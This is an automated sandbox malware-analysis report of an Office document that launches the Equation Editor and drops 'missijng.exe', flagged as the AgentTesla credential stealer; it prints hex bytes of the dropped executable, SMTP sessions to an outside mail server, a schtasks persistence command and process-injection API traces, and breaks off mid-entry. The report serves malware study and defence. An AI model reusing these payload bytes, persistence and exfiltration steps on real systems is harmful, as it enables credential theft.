00 0a 80 02 00 00 04 73 38 00 00 0a 80 03 00 00 04 73 39 00 00 0a 80 04 00 00 04 73 3a 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 3b 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 3c 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 3d 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 3e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 05 00 00 11 00 7e 05 00 00 04 6f 3f 00 00 0a 0a 2b 00 06 2a 26 00 02 28 40 00 00 0a 00 2a 00 00 13 30 02 00 3c 00 00 00 06 00 00 11 00 7e 06 00 00 04 14 28 41 00 00 0a 0b 07 2c 21 72 01 00 00 70 d0 05 00 00 02 28 42 00 00 0a 6f 43 00 00 0a 73 44 00 00 0a 0c 08 80 06 00 00 04 00 00 7e 06 00 00 04 0a 2b 00 06 2a 13 30 01 00 0b 00 00 00 07 00 00 11 00 7e 07 00 00 04 0a 2b 00 06 2a 22 00 02 80 07 00 00 04 2a 13 30 03 00 26 00 00 00 08 00 00 11 00 28 0c 00 00 06 72 39 00 00 70 7e 07 00 00 04 6f 45 00 00 0a 28 46 00 00 0a 0b 07 74
                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL6+`PPn @ @mO H.textN P `.rsrcR@@.relocj@BmHj{0(,(-(o.*(/(0(1(2(3*N(o(4*&(5*s6s7s8s9s:*0~o;+*0~o<+*0~o=+*0~o>+*0~o?+*&(@*0<~(A,!rp(BoCsD~+*0~+*"*0&(r9p~oE(Ft


                                                                                  SMTP Packets

                                                                                  TimestampSource PortDest PortSource IPDest IPCommands
                                                                                  Feb 4, 2021 09:19:56.233417034 CET58749168198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                  Feb 4, 2021 09:20:02.229574919 CET58749169198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                  Feb 4, 2021 09:20:02.230037928 CET49169587192.168.2.22198.54.122.60EHLO 579569
                                                                                  Feb 4, 2021 09:20:02.421497107 CET58749169198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                                  250-PIPELINING
                                                                                  250-SIZE 81788928
                                                                                  250-ETRN
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250 STARTTLS
                                                                                  Feb 4, 2021 09:20:02.422681093 CET49169587192.168.2.22198.54.122.60STARTTLS
                                                                                  Feb 4, 2021 09:20:02.613312960 CET58749169198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                  Feb 4, 2021 09:20:10.594412088 CET58749171198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                  Feb 4, 2021 09:20:10.594692945 CET49171587192.168.2.22198.54.122.60EHLO 579569
                                                                                  Feb 4, 2021 09:20:10.785933971 CET58749171198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                                  250-PIPELINING
                                                                                  250-SIZE 81788928
                                                                                  250-ETRN
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250 STARTTLS
                                                                                  Feb 4, 2021 09:20:10.786364079 CET49171587192.168.2.22198.54.122.60STARTTLS
                                                                                  Feb 4, 2021 09:20:10.977701902 CET58749171198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                  Feb 4, 2021 09:20:20.202948093 CET58749172198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                  Feb 4, 2021 09:20:20.203399897 CET49172587192.168.2.22198.54.122.60EHLO 579569
                                                                                  Feb 4, 2021 09:20:20.394241095 CET58749172198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                                  250-PIPELINING
                                                                                  250-SIZE 81788928
                                                                                  250-ETRN
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250 STARTTLS
                                                                                  Feb 4, 2021 09:20:20.394588947 CET49172587192.168.2.22198.54.122.60STARTTLS
                                                                                  Feb 4, 2021 09:20:20.585110903 CET58749172198.54.122.60192.168.2.22220 Ready to start TLS
                                                                                  Feb 4, 2021 09:20:26.294228077 CET58749173198.54.122.60192.168.2.22220 PrivateEmail.com Mail Node
                                                                                  Feb 4, 2021 09:20:26.294508934 CET49173587192.168.2.22198.54.122.60EHLO 579569
                                                                                  Feb 4, 2021 09:20:26.485496044 CET58749173198.54.122.60192.168.2.22250-MTA-10.privateemail.com
                                                                                  250-PIPELINING
                                                                                  250-SIZE 81788928
                                                                                  250-ETRN
                                                                                  250-AUTH PLAIN LOGIN
                                                                                  250-ENHANCEDSTATUSCODES
                                                                                  250-8BITMIME
                                                                                  250 STARTTLS
                                                                                  Feb 4, 2021 09:20:26.486324072 CET49173587192.168.2.22198.54.122.60STARTTLS
                                                                                  Feb 4, 2021 09:20:26.677675009 CET58749173198.54.122.60192.168.2.22220 Ready to start TLS

                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  Analysis Process: WINWORD.EXE PID: 2280 Parent PID: 584

                                                                                  General

                                                                                  Start time:09:18:36
                                                                                  Start date:04/02/2021
                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                  Imagebase:0x13fba0000
                                                                                  File size:1424032 bytes
                                                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: EQNEDT32.EXE PID: 2536 Parent PID: 584

                                                                                  General

                                                                                  Start time:09:18:37
                                                                                  Start date:04/02/2021
                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                  Imagebase:0x400000
                                                                                  File size:543304 bytes
                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: missijng.exe PID: 2932 Parent PID: 2536

                                                                                  General

                                                                                  Start time:09:19:05
                                                                                  Start date:04/02/2021
                                                                                  Path:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  Imagebase:0xd20000
                                                                                  File size:1076224 bytes
                                                                                  MD5 hash:75E7F84FC3FB447922B02A1289A4D827
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2148667814.0000000003239000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2148163225.0000000002231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2148188373.0000000002250000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 27%, ReversingLabs
                                                                                  Reputation:low

                                                                                  Chronological Activities

                                                                                  Analysis Process: schtasks.exe PID: 2896 Parent PID: 2932

                                                                                  General

                                                                                  Start time:09:19:07
                                                                                  Start date:04/02/2021
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ROGxuzog' /XML 'C:\Users\user\AppData\Local\Temp\tmp45B8.tmp'
                                                                                  Imagebase:0x90000
                                                                                  File size:179712 bytes
                                                                                  MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Analysis Process: missijng.exe PID: 3024 Parent PID: 2932

                                                                                  General

                                                                                  Start time:09:19:08
                                                                                  Start date:04/02/2021
                                                                                  Path:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\missijng.exe
                                                                                  Imagebase:0xd20000
                                                                                  File size:1076224 bytes
                                                                                  MD5 hash:75E7F84FC3FB447922B02A1289A4D827
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:.Net C# or VB.NET
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2405015067.0000000002334000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2405015067.0000000002334000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2404900279.0000000002231000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2404465078.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.2405276840.00000000025DE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2405276840.00000000025DE000.00000004.00000001.sdmp, Author: Joe Security
                                                                                  Reputation:low

                                                                                  Chronological Activities

                                                                                  Analysis Process: EQNEDT32.EXE PID: 2996 Parent PID: 584

                                                                                  General

                                                                                  Start time:09:19:24
                                                                                  Start date:04/02/2021
                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                  Imagebase:0x400000
                                                                                  File size:543304 bytes
                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high

                                                                                  Chronological Activities

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >

                                                                                    Analysis Process: missijng.exe PID: 2932 Parent PID: 2536 missijng.exeCOMMON

                                                                                    Executed Functions

                                                                                    Function 002F1CE0, Relevance: .2, Instructions: 217COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8295467bfeb42fa5a4a4cb085b2e48836470322c43190c3ce7404693efbea1e5
                                                                                    • Instruction ID: 72d1f52e26f7e2b35ae8036c693510184067a8ef8e0daffffec12d5d7c5021d4
                                                                                    • Opcode Fuzzy Hash: 8295467bfeb42fa5a4a4cb085b2e48836470322c43190c3ce7404693efbea1e5
                                                                                    • Instruction Fuzzy Hash: CF9137B0E1021DCFDB14DFAAC840BEDFBF6AF89355F948569D608A7204DB7049A58F50
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002F1787, Relevance: .2, Instructions: 172COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b094232bd8f9b74786ad9dc145713f19f6cee4fae54292eeee9a187409dfaf60
                                                                                    • Instruction ID: 78f99cebc59b4608e35f1d8512d429bba232d74963a6810168b9fde7f8a89faf
                                                                                    • Opcode Fuzzy Hash: b094232bd8f9b74786ad9dc145713f19f6cee4fae54292eeee9a187409dfaf60
                                                                                    • Instruction Fuzzy Hash: F571D274E14209CFDB14DFAAC994AADFBF2BF89340F608029D509AB365DB709991CF41
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FA4CC, Relevance: 1.8, APIs: 1, Instructions: 327processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002FA79F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 2bebc58ef08e8a29c1e8d3e8a951ae9df0ab695dcefe96862461cebd94383e36
                                                                                    • Instruction ID: d6922125f845b74f07fe35bcab1eed9a12cec13ef7036d514747fbb1f6ab5197
                                                                                    • Opcode Fuzzy Hash: 2bebc58ef08e8a29c1e8d3e8a951ae9df0ab695dcefe96862461cebd94383e36
                                                                                    • Instruction Fuzzy Hash: 7DC133B0D1021E8FDF20CFA4C845BEEBBB5BB49344F0495AAD949B7240DB749A95CF81
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FA4D8, Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 002FA79F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 57bba545f85d9128650d7a5cd4b6a32c4acc2dbe84523e0c95c0c9b25a1386b9
                                                                                    • Instruction ID: c2ba523b88fb6213a4b44ee2ce829559fde8aef99342cb3620139185145765bf
                                                                                    • Opcode Fuzzy Hash: 57bba545f85d9128650d7a5cd4b6a32c4acc2dbe84523e0c95c0c9b25a1386b9
                                                                                    • Instruction Fuzzy Hash: 45C133B0D1021E8FDF20CFA4C845BEDBBB5BB49304F0495AAD909B7240DB749A95CF85
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FA138, Relevance: 1.6, APIs: 1, Instructions: 121injectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002FA213
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: 4385232c684e2a9c38e25bfd443ccf4708f260be6d3d9fcb16c466b99e9d9036
                                                                                    • Instruction ID: 9963b619d37d708d66f6fa3a01e0b49e6fc9e0a08793730372d2e0ffc4b11cc3
                                                                                    • Opcode Fuzzy Hash: 4385232c684e2a9c38e25bfd443ccf4708f260be6d3d9fcb16c466b99e9d9036
                                                                                    • Instruction Fuzzy Hash: 2141BBB4D012489FCF10CFA9D984AEEFBF1BB49304F24942AE819B7250D379AA55CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FA140, Relevance: 1.6, APIs: 1, Instructions: 118injectionCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002FA213
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3559483778-0
                                                                                    • Opcode ID: f10a8fe65ab86a9b2ac5053827c216322422fee25c459be95ce2e5a1908376a3
                                                                                    • Instruction ID: d8020de094e39227d7cc12f5826f388a7d29ee20abe9ff3e2dacea9ea1ed9d19
                                                                                    • Opcode Fuzzy Hash: f10a8fe65ab86a9b2ac5053827c216322422fee25c459be95ce2e5a1908376a3
                                                                                    • Instruction Fuzzy Hash: 9341A9B5D012489FCF00CFA9D984AEEFBF1BB49304F20942AE818B7210D775AA55CF64
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FA298, Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002FA352
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: b0c94ad979023b26e54c30971a15abc0f165c8e21f48a3620230bd9f0c1c5736
                                                                                    • Instruction ID: 3069c5f81d78cfd8686d62559794b0c888cef8850d6f00e6a3e4e05c89a7484f
                                                                                    • Opcode Fuzzy Hash: b0c94ad979023b26e54c30971a15abc0f165c8e21f48a3620230bd9f0c1c5736
                                                                                    • Instruction Fuzzy Hash: 1F41C9B9D042589FCF10CFA9D884AEEFBB1BF49310F20942AE815B7240D774A956CF65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FA2A0, Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 002FA352
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: MemoryProcessRead
                                                                                    • String ID:
                                                                                    • API String ID: 1726664587-0
                                                                                    • Opcode ID: e51eb43745a459196f11c9b4a01ceedb70c193afbb024045475f666b186fda3a
                                                                                    • Instruction ID: 65d38b175198d8d63af1b38009e1465dd4bfb3997386ff15b9ab5a2268b67af3
                                                                                    • Opcode Fuzzy Hash: e51eb43745a459196f11c9b4a01ceedb70c193afbb024045475f666b186fda3a
                                                                                    • Instruction Fuzzy Hash: 7B41B9B9D002589FCF00CFA9D884AEEFBB1BF49310F10942AE815B7200D775A955CF65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002FA018, Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 002FA0C2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 8221e59255c947f8c7ac1644d02d6dc498ece66557db4653468ec223aeed0b79
                                                                                    • Instruction ID: 897bd5f6cc0d2cf4d3f4f33bd31ea41a0e6df1d792e0060237360d8fad90c0f9
                                                                                    • Opcode Fuzzy Hash: 8221e59255c947f8c7ac1644d02d6dc498ece66557db4653468ec223aeed0b79
                                                                                    • Instruction Fuzzy Hash: 3041A9B4D002489BCF10CFA9D884AEEFBB5FB49310F10942AE815B7300D735A911CF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002F9EE0, Relevance: 1.6, APIs: 1, Instructions: 100threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 002F9F97
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 2d5a3322145c1b0deb70f820dc05c15c223395c719317e115a715bbf971b1be1
                                                                                    • Instruction ID: 59abb364ab1ece07a8ad5dada81dce23f33502227d5869926d0deb8681d1a721
                                                                                    • Opcode Fuzzy Hash: 2d5a3322145c1b0deb70f820dc05c15c223395c719317e115a715bbf971b1be1
                                                                                    • Instruction Fuzzy Hash: E441BCB5D102589FCB10CFA9D884AEEFBB5BB49314F24842AE419B7200D774A995CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002F9EE8, Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 002F9F97
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: ContextThreadWow64
                                                                                    • String ID:
                                                                                    • API String ID: 983334009-0
                                                                                    • Opcode ID: 2c0ff6fa6263bb2471f3d8448d6f45ae0e7edbbf879e57ad6d0fb5f6293c7f0c
                                                                                    • Instruction ID: 84141a891bb578d79fd21405ae7203415fa08fa7ea58b823cb36c01347a57657
                                                                                    • Opcode Fuzzy Hash: 2c0ff6fa6263bb2471f3d8448d6f45ae0e7edbbf879e57ad6d0fb5f6293c7f0c
                                                                                    • Instruction Fuzzy Hash: F841CCB4D002189FCB10CFA9D884AEEFBF5BF49314F24842AE819B7200D778A985CF54
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002F9DF8, Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • ResumeThread.KERNELBASE(?), ref: 002F9E76
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: f7ffafcbf5799e467b66d50c9e04a79249da54709e6858f7fb59c8031ba53693
                                                                                    • Instruction ID: 84ad7a5d1324f10f864849a381a512c9abc71e2dfe4ac468142df9e17d1c836d
                                                                                    • Opcode Fuzzy Hash: f7ffafcbf5799e467b66d50c9e04a79249da54709e6858f7fb59c8031ba53693
                                                                                    • Instruction Fuzzy Hash: D531B9B5D102189FCF14CFA9D884AEEFBB5EB49314F24982AE819B7300D775A941CF94
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001BD01C, Relevance: .1, Instructions: 72COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147807636.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2072086417e785c62ae145f651407cc4707b692f7bfff875712f4880dccd9199
                                                                                    • Instruction ID: aae89550d8abffc83252bbd8c2bf7f0777c3eaf38a8a22bbd352427613a5ee63
                                                                                    • Opcode Fuzzy Hash: 2072086417e785c62ae145f651407cc4707b692f7bfff875712f4880dccd9199
                                                                                    • Instruction Fuzzy Hash: DF21F275604204DFCB18EF64E984B56BBA5EB88314F24C9A9E8094B346D33AD847CBA1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001BD006, Relevance: .1, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147807636.00000000001BD000.00000040.00000001.sdmp, Offset: 001BD000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 96b3b3899673764e020ac032bf3d2fa20030c00e4d733b2aa700d471a1d99dfb
                                                                                    • Instruction ID: 0cfd3e692b657a554237cdaf5cedb6f5fcf3ed9c6690fb020ff99b9fe8da80a8
                                                                                    • Opcode Fuzzy Hash: 96b3b3899673764e020ac032bf3d2fa20030c00e4d733b2aa700d471a1d99dfb
                                                                                    • Instruction Fuzzy Hash: F7217F755083809FCB06DF14D994B15BFB1EB46314F28C5EAD8498B266D33A9816CB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001AD1C5, Relevance: .0, Instructions: 45COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147798302.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c94fd43c4149de9ac7550b78a335057ba9c8bdf5955676b3ffd09fbbd0de015e
                                                                                    • Instruction ID: e9a4bd083a3c835db88c6374266db1cc81f07ab75e1cdd11492c90e597eef01c
                                                                                    • Opcode Fuzzy Hash: c94fd43c4149de9ac7550b78a335057ba9c8bdf5955676b3ffd09fbbd0de015e
                                                                                    • Instruction Fuzzy Hash: F501A739404B449BD7208B65E988B67BBDCEF93724F14C45BED4A1A686C774DC40C6B1
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 001AD1C4, Relevance: .0, Instructions: 36COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147798302.00000000001AD000.00000040.00000001.sdmp, Offset: 001AD000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b700a6cb32fa9f7f063c9ad126d98414fbd0d8f190a8e17577cc75ec1c0dcb34
                                                                                    • Instruction ID: a85259ce00723b6863b103abcc18446f9b266d0e91e3e02d4ab32821c7ebe223
                                                                                    • Opcode Fuzzy Hash: b700a6cb32fa9f7f063c9ad126d98414fbd0d8f190a8e17577cc75ec1c0dcb34
                                                                                    • Instruction Fuzzy Hash: 09F0C831404740ABD7108E15E888B63FFD8EB92724F14C45BED481B646C374DC44CBB0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00D277E7, Relevance: 1.8, Instructions: 1793COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2148064147.0000000000D22000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true
                                                                                    • Associated: 00000004.00000002.2148061299.0000000000D20000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000004.00000002.2148130753.0000000000DE8000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d032f7d93a19073951887354a8cde9fa7606b56acbf758da4fa84c19ea788923
                                                                                    • Instruction ID: dd92727680d339c3499fe902374cc7597bdb2dfd5b95100e5423170b860579c5
                                                                                    • Opcode Fuzzy Hash: d032f7d93a19073951887354a8cde9fa7606b56acbf758da4fa84c19ea788923
                                                                                    • Instruction Fuzzy Hash: 86E2167140E3D29FCB578F789DB01D17FB0AE6321831E04DBD4C18E1A3E229695ADB62
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 002F3787, Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.2147852428.00000000002F0000.00000040.00000001.sdmp, Offset: 002F0000, based on PE: false
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: p!H
                                                                                    • API String ID: 0-1596484867
                                                                                    • Opcode ID: 4ee35d631616f3368cba9c309a10cb621a912fe59c4d97b9003627d69f29b5dc
                                                                                    • Instruction ID: 47cacb1c775d0220e38648d6a35025bb67831ae712cb790f02d72e15fb543af0
